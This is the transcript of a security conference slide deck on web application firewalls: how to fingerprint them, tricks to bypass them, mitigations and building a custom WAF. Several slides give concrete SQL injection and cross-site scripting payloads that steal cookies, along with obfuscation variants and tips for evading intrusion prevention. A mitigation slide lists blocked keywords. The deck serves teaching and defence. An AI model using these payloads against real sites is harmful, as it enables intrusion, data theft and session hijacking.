Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Application firewall tricks and tips

CoolerVoid
September 27, 2021
240

Web Application firewall tricks and tips

Web Application firewall tricks and tips.

* How you can develop your WAF
* How too bypass any WAF

CoolerVoid

September 27, 2021
Tweet

Transcript

  1. Whoamy • Antonio Costa aka Cooler_ • Projects: Github.com/CoolerVoid •

    Contact: [email protected] • Cyber security engineer • Programmer/developer • 13 years of work experience with pentest, codereview, development, incident detection, incident response and hardening.
  2. Other resources for rules • Block per IP adress •

    Leak mitigation(responses) • Insert anti-csrf tokens • Detect UserAgent anomaly • Strong blocklist • Denial of service • Force hardening in custom endpoints Headers HSTS, anti-xss, CSP, nosniff… • Insert cookie attributes, httponly Secure...
  3. Practical point view • Detection the type of WAF •

    Common attacks in WAF • Custom attacks to bypass WAF • Attack Mitigation in WAF • Attack Mitigation in application • Create your custom WAF • My OpenSource Projects • Attack and Protection!
  4. Detection You can search a pattern in cookie, header response…

    Each WAF have a different context in response. • https://svn.nmap.org/nmap/scripts/http-waf-detect.nse • https://github.com/sandrogauci/wafw00f • http://code.google.com/p/imperva-detect/
  5. Common attacks • WAFs can be configured to actively block

    requests and traffic that violate the WAF rule-sets. This is a useful feature, but needs to be used judiciously, an WAF that is in over-active blocking mode prevents legitimate traffic from reaching the Web server, making the application unusable. • Sometimes have a weak rules, that don’t match attacks to block.
  6. Mixed case • Cool trick to bypass a common rule

    is mixed case, here the big purpose is bypass absence of case sensitive rules. • SELECT, SeLect, selEcT… UnIOn, unIoN... • Look this following: • /sell/cars.php?search=<script>alert(document.cookie)</script> • /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt>
  7. Replace Keywords • Replace Keywords is common function in WAFs,

    this resource erase critical points in attacks, but you can bypass this, you need a point to insert attack word between payload. • Look this following: • /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9 • /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9
  8. Spaces to comment • Replace points to comments is very

    good way to bypass WAF. • Look this following: • /sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,database()– - • /sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*! • table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
  9. Encode abuse • Other trick to bypass, is the abuse

    of encode, sometimes application can render encoded strings... • Look this following: <script>alert(document.cookie)</script> • Url encode: %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E • 64 encode: PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ=
  10. Buffer Overflow • When WAF service don’t have a proper

    validation in inputs, you can see this problem in fuzzing tests... • Look this following: • /cars/id/page/=-25+and+(select 2)=(Select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7… • id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...) +uNIoN+seLecT+2,3,version()...
  11. HTTP Parameter Pollution(HPP) The following request doesn’t allow anyone to

    conduct an attack: • /?id=1;select+4,5,6+from+users+where+id=1-- • This request will be successfully performed using HPP. • /?id=1;select+4&id=5,6+from+users+where+id=1-- • Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked
  12. Using HTTP Parameter Fragmentation (HPF) execute_query("select * from table where

    a=".input_a." and b=".input_b); execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c); • The following request doesn’t allow anyone to conduct an attack • /?a=1+union+select+1,2/* These requests is a possible attack using HPF • /?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- • The SQL requests become • select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/*limit */from users--
  13. Time machine • Random delay each request • Random UserAgent

    per request • Random IP address per request(Proxy) • Bypass Intrusion prevention system (IPS) Web application firewall (WAF)
  14. Automate • Project to change your list of payloads using

    a lot techniques to help bypass a WAF. • https://github.com/CoolerVoid/payloadmask
  15. Fuzzing / Brute • 0d1n is a tool for automating

    customized attacks against web applications. • Open Source • Use thread pool • Github.com/CoolerVoid/0d1n
  16. Fuzzing / Brute • 0d1n –host http://localhost/test.php –post ”car_name_search=ˆ ”

    –payloads payloads/xss.txt –find_regex_list payloads/guess.txt –log name_log –save_response –tamper urlencode -proxy-rand payloads/proxy.txt
  17. Application mitigations • Validation and proper sanitization(remove DOM, js, HTML…).

    • Prepared Statements (with Parameterized Queries). • Create a function that check a Block list with common words in attacks (eval,timeout,union,--, select, delete, version, benchmark, sleep, /**/...), set all string to lower case before scan pattern. • Study your ORM(SQLalchemy, Hibernate...) to prevent pitfalls in resources. • Follow Mitre and OWASP tricks to hardening etc...
  18. Create your WAF • Study five years around sockets and

    raw sockets • Demultiplexer problems (select(), epoll(), kqueue(), pthreads(), MPI…) • Race conditions • Testing a lot list of libraries libuv(used by node) libevent(old lib for core of nginx) Python Twisted
  19. Create your WAF • WAF from the scratch RaptorWAF •

    Demultiplexer use select() with pthreads • Have a problem, race conditions in millions connections(lock with mutex cannot save). • Easy to understand • Github.com/CoolerVoid/RaptorWAF
  20. Create your WAF • Pthread tests • Libevent study •

    Lighthttpd core study • The big travel...
  21. Create your WAF • OctopusWAF • Uses LibEvent • Have

    support to heavy connections • Uses lib Injection to detect SQLi • Github.com/CoolerVoid/OctopusWAF
  22. Detections • Machine learning • Natural language • IA •

    Score based • Uploads (binary checks)